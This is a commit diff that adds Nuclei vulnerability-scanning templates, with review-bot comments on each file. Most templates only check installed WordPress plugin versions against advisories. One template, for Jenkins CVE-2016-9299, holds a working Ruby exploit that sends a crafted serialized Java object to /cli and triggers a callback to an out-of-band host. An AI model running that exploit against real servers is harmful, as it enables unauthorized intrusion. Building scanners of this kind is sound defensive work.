Commit
1 parent 63b1127, commit 4fc5b88
Showing 219 changed files with 13,085 additions and 1 deletion.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241030 | ||
20241031 |
59 changes: 59 additions & 0 deletions
poc/auth/mycred-for-elementor-e30e983bb02401924b572068b6c5451f.yaml
@@ -0,0 +1,59 @@ | ||
id: mycred-for-elementor-e30e983bb02401924b572068b6c5451f | ||
|
||
info: | ||
name: > | ||
myCred Elementor <= 1.2.6 - Authenticated (Contributor+) Stored Cross-Site Scripting | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/0fe2e1d6-7431-4121-93ad-cfe7837ac374?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/mycred-for-elementor/" | ||
google-query: inurl:"/wp-content/plugins/mycred-for-elementor/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,mycred-for-elementor,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/mycred-for-elementor/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "mycred-for-elementor" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.2.6') |
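Review bot: the `info` block ships with empty `description`, `cvss-metrics`, `cvss-score` and `cve-id` values and a placeholder `shodan-query: 'vuln:'`, while `tags` still carries `cve`; either fill these from the referenced Wordfence advisory or drop the empty keys and the `cve` tag so the metadata does not claim a CVE the template never names. Note also that the template only reads `Stable tag` from `readme.txt` and evaluates `compare_versions(version, '<= 1.2.6')`: it fingerprints an installed version and does not confirm the stored XSS, and a readme whose `Stable tag` is non-numeric (for example `trunk`) leaves `version` unset, so the DSL matcher silently yields no finding. A one-line `description` stating that the check is version-based would make that explicit for triage.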
59 changes: 59 additions & 0 deletions
poc/aws/CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086.yaml
@@ -0,0 +1,59 @@ | ||
id: CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086 | ||
|
||
info: | ||
name: > | ||
BP Member Type Manager <= 1.01 - Reflected Cross-Site Scripting | ||
author: topscoder | ||
severity: medium | ||
description: > | ||
The BP Member Type Manager plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in versions up to, and including, 1.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d167a483-7190-4285-a055-2280cc36f9c6?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2024-49634 | ||
metadata: | ||
fofa-query: "wp-content/plugins/bp-member-type-manager/" | ||
google-query: inurl:"/wp-content/plugins/bp-member-type-manager/" | ||
shodan-query: 'vuln:CVE-2024-49634' | ||
tags: cve,wordpress,wp-plugin,bp-member-type-manager,medium | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/bp-member-type-manager/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "bp-member-type-manager" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.01') |
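Review bot: the destination path `poc/aws/CVE-2024-49634-2ec2de08e397d2077d08a4542cf24086.yaml` does not fit the content, which is a WordPress plugin template (`bp-member-type-manager`) with no AWS relevance; the other templates in this commit sit under `poc/auth/` and `poc/cve/`, so `poc/cve/` looks like the intended location. The metadata itself is consistent (`cvss-score: 6.1` matches `severity: medium`), but as with the other readme-based templates the `word` matcher on `bp-member-type-manager` plus the `Stable tag` extractor only establish an installed version, not an exploitable instance, and that should be reflected in how hits are triaged.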
@@ -0,0 +1,59 @@ | ||
id: surveyjs-cd16aaba63a1955d07ab2e32ec2b02e5 | ||
|
||
info: | ||
name: > | ||
SurveyJS: Drag & Drop WordPress Form Builder <= 1.9.136 - Authenticated (Subscriber+) Arbitrary File Upload | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/07f6bf26-0b01-48be-bfe1-8213c5d5983f?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/surveyjs/" | ||
google-query: inurl:"/wp-content/plugins/surveyjs/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,surveyjs,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/surveyjs/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "surveyjs" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.9.136') |
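Review bot: `severity: low` looks inconsistent with the template name, which describes an authenticated (Subscriber+) arbitrary file upload, and the fields that would justify the rating (`cvss-metrics`, `cvss-score`) are empty, as are `description` and `cve-id`, with `shodan-query: 'vuln:'` left as a placeholder. Confirm the rating against the referenced Wordfence advisory and fill or remove the empty keys before merging; if no CVE has been assigned, the `cve` tag should go as well.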
@@ -0,0 +1,123 @@ | ||
id: CVE-2016-9299 | ||
|
||
info: | ||
name: Jenkins CLI - HTTP Java Deserialization | ||
author: iamnoooob,rootxharsh,pdresearch | ||
severity: critical | ||
description: | | ||
The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server. | ||
reference: | ||
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/jenkins_ldap_deserialize.rb | ||
- https://nvd.nist.gov/vuln/detail/CVE-2016-9299 | ||
classification: | ||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 9.8 | ||
cve-id: CVE-2016-9299 | ||
cwe-id: CWE-90 | ||
cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* | ||
metadata: | ||
max-request: 1 | ||
verified: true | ||
vendor: jenkins | ||
product: jenkins | ||
shodan-query: product:"jenkins" | ||
fofa-query: icon_hash=81586312 | ||
tags: cve,cve2016,rce,deserialization | ||
|
||
variables: | ||
oast: "{{interactsh-url}}" | ||
|
||
code: | ||
- engine: | ||
- rb | ||
- ruby # requires ruby to be pre-installed on system running nuclei | ||
|
||
source: | | ||
require 'socket' | ||
require 'base64' | ||
# Define environment variables for host details (make sure they are properly set in your environment) | ||
$Hostname = ENV['Hostname'] | ||
$Host = ENV['Host'] | ||
$Port = ENV['Port'] | ||
interactsh = (ENV['oast']).ljust(45,'/') | ||
url_dns = "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" | ||
$decoded_url_dns = [url_dns].pack("H*") | ||
$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh | ||
# Step 1: Send the download request without waiting for a response or closing the socket | ||
def send_download_request(host, port) | ||
download_socket = TCPSocket.new(host, port) | ||
download_request = <<~REQ | ||
POST /cli HTTP/1.1 | ||
Host: #{$Hostname} | ||
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 | ||
Side: download | ||
Content-Type: application/x-www-form-urlencoded | ||
Content-Length: 0\r\n | ||
REQ | ||
#puts "Sending Download Request..." | ||
download_socket.write(download_request) | ||
# Return the open socket so we can read from it later | ||
return download_socket | ||
end | ||
# Step 2: Send the upload request | ||
def send_upload_request(host, port) | ||
socket = TCPSocket.new(host, port) | ||
# Base64 decoded payload for upload request | ||
chunked_payload = "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00\x01\x55" + $decoded_url_dns | ||
upload_request = <<~REQ | ||
POST /cli HTTP/1.1 | ||
Host: #{$Hostname} | ||
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e93 | ||
Side: upload | ||
Content-Type: application/octet-stream | ||
Content-Length: #{chunked_payload.bytesize}\r\n | ||
REQ | ||
#puts "Sending Upload Request..." | ||
socket.write(upload_request) | ||
# Send the binary data (payload) | ||
socket.write(chunked_payload) | ||
# Read and print the response for the upload request | ||
response = socket.readpartial(1024) | ||
#puts "Received from server (upload response): #{response}" | ||
# Close the socket for upload request | ||
socket.close | ||
end | ||
# Step 3: After upload request, read the download request's response | ||
def read_download_response(socket) | ||
#puts "Reading Download Request Response..." | ||
response = socket.readpartial(1024) | ||
socket.close | ||
response | ||
end | ||
# Combined steps to perform the operations in the required order | ||
# Step 1: Send download request (don't wait for response, keep the socket open) | ||
download_socket = send_download_request($Host, $Port) | ||
# Step 2: Send upload request | ||
send_upload_request($Host, $Port) | ||
# Print the download response | ||
puts read_download_response(download_socket) | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "contains(response,'hudson.remoting.UserRequest')" | ||
- 'contains(interactsh_protocol, "dns")' | ||
condition: and | ||
# digest: 490a0046304402203cca921300c636eb8d986136c3b5dd567649cc0e956e016278f9e8e6d2e2f14602207e558f218d7293d1e2d1fa942bc313b240086e5f74545143c5553d3d044b4831:922c64590222798bb761d5b6d8e72950 |
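Review bot: in the Ruby `source`, `$decoded_url_dns = $decoded_url_dns.gsub! "ewawjwcswxvkjfswcqli1fssv25rq0d8d.oast.online", interactsh` assigns the return value of `gsub!`, which is `nil` when no substitution happens, so any future edit to the embedded payload that drops that placeholder turns the variable into `nil` and the string concatenation in `send_upload_request` raises `TypeError`; use the non-destructive form, `$decoded_url_dns = $decoded_url_dns.gsub("...oast.online", interactsh)`. Two robustness points as well: `interactsh = (ENV['oast']).ljust(45,'/')` is there to keep the replacement the same length as the 45-character placeholder so the length prefix of the serialized string stays valid, which deserves a comment and an explicit failure when the interactsh hostname is longer than 45 characters (padding cannot shorten it); and both `readpartial(1024)` calls return at most one chunk and raise `EOFError` on a closed connection, so the `contains(response,'hudson.remoting.UserRequest')` matcher can miss a marker that sits past the first 1024 bytes, while a server that closes the download side early aborts the template with an unhandled exception instead of a clean non-match. Finally, `cwe-id: CWE-90` (LDAP injection) sits oddly beside the `deserialization` tag; confirm the CWE against the NVD reference.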
59 changes: 59 additions & 0 deletions
poc/cve/CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f.yaml
@@ -0,0 +1,59 @@ | ||
id: CVE-2023-46606-d2704f0b26ff9bb4048f99cda838a52f | ||
|
||
info: | ||
name: > | ||
AtomChat <= 1.1.4 - Missing Authorization via credits REST API Endpoint | ||
author: topscoder | ||
severity: high | ||
description: > | ||
The AtomChat plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'credits' REST API function in versions up to, and including, 1.1.4. This makes it possible for unauthenticated attackers to manipulate user credits when the myCred plugin is installed. | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/21f917a4-efee-421b-98b1-a9b18c7527d2?source=api-prod | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N | ||
cvss-score: 5.3 | ||
cve-id: CVE-2023-46606 | ||
metadata: | ||
fofa-query: "wp-content/plugins/atomchat/" | ||
google-query: inurl:"/wp-content/plugins/atomchat/" | ||
shodan-query: 'vuln:CVE-2023-46606' | ||
tags: cve,wordpress,wp-plugin,atomchat,high | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/atomchat/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "atomchat" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 1.1.4') |
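Review bot: `severity: high` contradicts the classification block, where `cvss-score: 5.3` with vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N` falls in the CVSS v3.1 Medium band (4.0 to 6.9), and the `tags` line repeats `high`; align the severity and the tag with the score, or with the referenced Wordfence advisory if it rates the issue differently. As with the other readme-based templates in this commit, a match only establishes that AtomChat <= 1.1.4 is installed; it does not touch the `credits` REST endpoint, so a hit is a version indicator rather than confirmation of the missing capability check.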